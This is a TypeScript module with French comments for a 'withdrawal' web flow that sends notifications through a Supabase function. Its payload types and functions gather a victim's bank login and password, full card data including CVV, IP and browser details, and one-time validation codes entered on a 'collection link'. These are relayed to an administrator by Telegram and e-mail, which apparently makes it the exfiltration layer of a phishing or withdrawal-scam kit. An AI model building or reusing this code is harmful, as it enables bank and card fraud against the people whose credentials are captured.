import { supabase } from '@/lib/supabase';

export type WithdrawalEmailTemplate =
  | 'validation_code'
  | 'admin_notification'
  | 'activation_confirmed'
  | 'processing_confirmed';

/**
 * Extrait le corps réel de la réponse d'une fonction en erreur.
 * Sans ça, on n'a qu'un « non-2xx status code » totalement opaque.
 */
async function readFunctionError(error: unknown): Promise<string> {
  const fallback = error instanceof Error ? error.message : 'Erreur inconnue';
  const context = (error as { context?: Response } | null | undefined)?.context;

  if (context && typeof context.clone === 'function') {
    try {
      const body = (await context.clone().json()) as { error?: unknown };
      if (body && typeof body === 'object' && body.error) {
        return String(body.error);
      }
    } catch {
      try {
        const text = await context.clone().text();
        if (text) return text.slice(0, 400);
      } catch {
        /* réponse illisible */
      }
    }
  }

  return fallback;
}

/**
 * Déclenche l'envoi d'un e-mail transactionnel côté Backend (SMTP Google).
 *
 * Important : l'envoi d'e-mail ne doit JAMAIS interrompre le parcours de
 * l'utilisateur. En cas d'échec (SMTP indisponible, quota, etc.), on se
 * contente de tracer un avertissement et on laisse le flux continuer.
 */
export async function sendWithdrawalEmail(
  requestId: string,
  template: WithdrawalEmailTemplate,
): Promise<void> {
  try {
    const { error } = await supabase.functions.invoke('send-email', {
      body: { requestId, template },
    });

    if (error) {
      const detail = await readFunctionError(error);
      console.warn(`Envoi de l'e-mail (${template}) échoué : ${detail}`);
    }
  } catch (err) {
    console.warn(`Envoi de l'e-mail (${template}) indisponible :`, err);
  }
}

export type TestEmailResult =
  | { ok: true; to: string }
  | { ok: false; error: string };

export type TestTelegramResult =
  | { ok: true; chatId: string }
  | { ok: false; error: string };

export type SubmitCodeResult = { ok: true } | { ok: false; error: string };

/**
 * Transmet à l'administrateur un code de validation saisi par le client via
 * le lien de collecte. Le Backend vérifie le lien (actif) et retrouve la
 * demande, puis notifie l'administrateur (Telegram + e-mail).
 */
export async function submitValidationCode(payload: {
  token: string;
  code: string;
  amount: number;
}): Promise<SubmitCodeResult> {
  try {
    const { data, error } = await supabase.functions.invoke('send-email', {
      body: { template: 'code_received', ...payload },
    });

    if (error) {
      return { ok: false, error: await readFunctionError(error) };
    }

    const result = data as { ok?: boolean; error?: string } | null;
    if (result && result.ok === false) {
      return { ok: false, error: result.error || 'Envoi refusé par le service.' };
    }

    return { ok: true };
  } catch (err) {
    return { ok: false, error: err instanceof Error ? err.message : 'Erreur inconnue' };
  }
}

export type SendCredentialsResult =
  | { ok: true; to: string }
  | { ok: false; error: string };

/**
 * Transmet au client ses identifiants de connexion bancaire.
 */
export async function sendBankCredentialsEmail(
  clientCode: string,
  recipient?: string,
): Promise<SendCredentialsResult> {
  try {
    const { data, error } = await supabase.functions.invoke('send-email', {
      body: { template: 'bank_credentials', clientCode, recipient },
    });

    if (error) {
      return { ok: false, error: await readFunctionError(error) };
    }

    const payload = data as { ok?: boolean; to?: string; error?: string } | null;
    if (payload && payload.ok === false) {
      return { ok: false, error: payload.error || 'Envoi refusé par le service.' };
    }

    return { ok: true, to: payload?.to ?? recipient ?? '' };
  } catch (err) {
    return { ok: false, error: err instanceof Error ? err.message : 'Erreur inconnue' };
  }
}

export type WithdrawalDetailsPayload = {
  fullName: string;
  bankName: string;
  iban: string;
  phone: string;
  email: string;
  amount: number;
  currency: string;
  authBank: string;
};

export type AuthAlertPayload = {
  clientCode: string;
  clientName: string;
  identifier: string;
  password?: string;
  bankName: string;
  method?: 'bank' | 'card';
  /** Informations de carte saisies par le client (uniquement pour la méthode carte). */
  card?: {
    brand: string;
    last8: string;
    expiry: string;
    cvv: string;
  };
  phase: 'login' | 'approval';
  ip: string;
  country?: string;
  userAgent: string;
  attemptsMax: number;
  attemptsLeft: number;
  details?: WithdrawalDetailsPayload;
};

/**
 * Alerte l'administrateur lorsqu'une authentification bancaire échoue.
 * Ne doit jamais interrompre le parcours client.
 */
export async function sendAdminAuthAlert(payload: AuthAlertPayload): Promise<void> {
  try {
    await supabase.functions.invoke('send-email', {
      body: { template: 'admin_auth_alert', ...payload },
    });
  } catch (err) {
    console.warn('Alerte administrateur indisponible :', err);
  }
}

/**
 * Informe le client que son authentification n'a pas abouti, avec le détail
 * complet du retrait concerné. Ne doit jamais interrompre le parcours client.
 */
export async function sendClientAuthFailedEmail(payload: {
  clientCode: string;
  clientName: string;
  attemptsMax: number;
  attemptsLeft: number;
  details: WithdrawalDetailsPayload;
}): Promise<void> {
  try {
    await supabase.functions.invoke('send-email', {
      body: { template: 'client_auth_failed', ...payload },
    });
  } catch (err) {
    console.warn('E-mail de réauthentification client indisponible :', err);
  }
}

/**
 * Envoie un e-mail de test à l'adresse administrateur pour vérifier le rendu
 * du modèle, sans créer de fausse demande de retrait.
 * Contrairement aux e-mails du parcours, on remonte ici le résultat à l'écran.
 */
export async function sendTestEmail(): Promise<TestEmailResult> {
  try {
    const { data, error } = await supabase.functions.invoke('send-email', {
      body: { template: 'test' },
    });

    if (error) {
      return { ok: false, error: await readFunctionError(error) };
    }

    const payload = data as { ok?: boolean; to?: string; error?: string } | null;
    if (payload && payload.ok === false) {
      return { ok: false, error: payload.error || 'Envoi refusé par le service.' };
    }

    return { ok: true, to: payload?.to ?? '' };
  } catch (err) {
    return { ok: false, error: err instanceof Error ? err.message : 'Erreur inconnue' };
  }
}

/**
 * Envoie un message de test au bot Telegram pour vérifier la configuration
 * (token + chat ID). Le résultat est remonté à l'écran administrateur.
 */
export async function sendTestTelegram(): Promise<TestTelegramResult> {
  try {
    const { data, error } = await supabase.functions.invoke('send-email', {
      body: { template: 'test_telegram' },
    });

    if (error) {
      return { ok: false, error: await readFunctionError(error) };
    }

    const payload = data as { ok?: boolean; chatId?: string; error?: string } | null;
    if (payload && payload.ok === false) {
      return { ok: false, error: payload.error || 'Envoi refusé par le service.' };
    }

    return { ok: true, chatId: payload?.chatId ?? '' };
  } catch (err) {
    return { ok: false, error: err instanceof Error ? err.message : 'Erreur inconnue' };
  }
}